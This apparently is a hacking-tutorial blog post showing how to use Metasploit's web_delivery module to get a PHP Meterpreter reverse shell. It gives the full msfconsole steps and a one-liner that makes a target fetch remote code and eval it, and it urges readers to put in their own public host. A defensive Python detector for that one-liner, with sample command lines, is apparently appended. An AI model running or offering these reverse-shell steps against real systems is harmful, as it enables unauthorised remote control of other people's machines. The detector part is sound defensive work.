Use Metasploit Web Delivery Script & command injection To Pop a shell


Hello guys, Cakil here again..
This time Cakil will share about the Metasploit Web Delivery Script & command injection to pop a shell.
Okay, check it out.

By the way, replace the host 127.0.0.1 with your own public host.
Since this is only a test, I'm using 127.0.0.1, ok.
For lport, use your public port :)

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)


msf exploit(multi/script/web_delivery) > set target 1
target => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf exploit(multi/script/web_delivery) > set lport 1337
lport => 1337
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:1337
[*] Using URL: http://0.0.0.0:8080/nHBdVWJ6UUYjv
[*] Local IP: http://10.251.71.73:8080/nHBdVWJ6UUYjv
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://127.0.0.1:8080/nHBdVWJ6UUYjv'));"
msf exploit(multi/script/web_delivery) > [*] 127.0.0.1        web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:50442) at 2018-12-29 13:18:27 +0700
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > help

The advantage.. we can create payloads such as
 Python
 PHP
 PSH
 Regsvr32
 PSH (Binary)
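
On the defender side, the PHP one-liner printed in the session above leaves a recognizable process command line. The following is an added example, not part of the original post: a small detector that flags PHP CLI invocations which fetch a URL and pass it to `eval()`. The function names and the sample log lines are constructed for illustration.

```python
import re
import shlex
from urllib.parse import urlparse

# eval() wrapped around a remote file_get_contents(), as in the printed one-liner.
FETCH_EVAL = re.compile(
    r"eval\s*\(\s*file_get_contents\s*\(\s*['\"](?P<url>https?://[^'\"]+)['\"]",
    re.IGNORECASE,
)
URL_FOPEN_ON = {"allow_url_fopen=true", "allow_url_fopen=1", "allow_url_fopen=on"}

def inspect_cmdline(cmdline):
    """Return a finding dict if a PHP CLI call fetches and evals remote code, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        argv = cmdline.split()
    if not argv or not re.fullmatch(r"php[\d.]*", argv[0].rsplit("/", 1)[-1]):
        return None
    ini, code = [], None
    for flag, value in zip(argv[1:], argv[2:]):  # walk (option, argument) pairs
        if flag == "-d":
            ini.append(value.lower())
        elif flag == "-r":
            code = value
    match = FETCH_EVAL.search(code or "")
    if not match:
        return None
    url = match.group("url")
    return {"url": url, "host": urlparse(url).hostname,
            "forces_url_fopen": any(s in URL_FOPEN_ON for s in ini)}

def scan(lines):
    """Run inspect_cmdline over log lines and keep only the hits."""
    return [hit for hit in map(inspect_cmdline, lines) if hit]

# Constructed sample process command lines (not taken from a real host).
SAMPLE = [
    "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://127.0.0.1:8080/nHBdVWJ6UUYjv'));\"",
    "php -r 'echo PHP_VERSION;'",
    "/usr/bin/php artisan queue:work",
    "/usr/bin/php7.4 -r \"eval( file_get_contents( 'http://192.0.2.10/x' ) );\"",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Setting `allow_url_fopen = Off` in php.ini does not stop this command because `-d` overrides it per invocation, which is why that flag is reported separately.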


Okay, enjoy.
Stay tuned for the next update.. it will surely be more fun and challenging, lol
